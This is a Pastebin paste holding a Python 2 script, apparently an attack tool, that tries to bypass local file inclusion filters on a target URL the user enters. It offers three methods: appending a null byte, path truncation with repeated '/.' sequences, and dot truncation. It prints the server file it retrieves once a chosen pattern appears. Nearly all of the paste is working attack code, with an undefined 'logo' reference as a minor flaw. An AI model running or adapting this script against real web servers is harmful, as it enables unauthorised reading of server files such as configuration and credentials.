Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import urllib2
- import sys
- import threading
- from sys import stdout
- import sys
- class Printer():
- """Print things to stdout on one line dynamically"""
- def __init__(self,data):
- sys.stdout.write("\r"+data.__str__())
- sys.stdout.flush()
- def nullbyte(target, pattern):
- data = urllib2.urlopen(target + "%00").read()
- if pattern in data:
- print "LFI Bypassed Successfully !"
- print "---------------------------"
- print data
- sys.exit(1)
- def pathtruncation(target, pattern):
- for length in range (1, 4097):
- output = "Trying With " + str(length) + " Characters"
- Printer(output)
- attack = '/.' * length
- data = urllib2.urlopen(target + attack).read()
- if pattern in data:
- print "\nLFI Bypassed Successfully !"
- print "Path CHARS : " + str(length)
- print "---------------------------"
- print data
- sys.exit(1)
- def dottruncation(target, pattern):
- for length in range (1, 4097):
- output = "Trying With " + str(length) + " Characters"
- Printer(output)
- attack = '.' * length
- data = urllib2.urlopen(target + attack).read()
- if pattern in data:
- print "\nLFI Bypassed Successfully !"
- print "Dot CHARS : " + str(length)
- print "---------------------------"
- print data
- sys.exit(1)
- print logo
- print "Chose Bypass Method :"
- print "1 ) Null Byte"
- print "2 ) Path Truncation"
- print "3 ) Dot Truncation"
- chose = raw_input("Chose :")
- if chose == "1":
- target = raw_input("target :")
- pattern = raw_input("pattern :")
- nullbyte(target, pattern)
- if chose == "2":
- target = raw_input("target :")
- pattern = raw_input("pattern :")
- pathtruncation(target, pattern)
- if chose == "3":
- target = raw_input("target :")
- pattern = raw_input("pattern :")
- dottruncation(target, pattern)
Advertisement
Add Comment
Please, Sign In to add comment
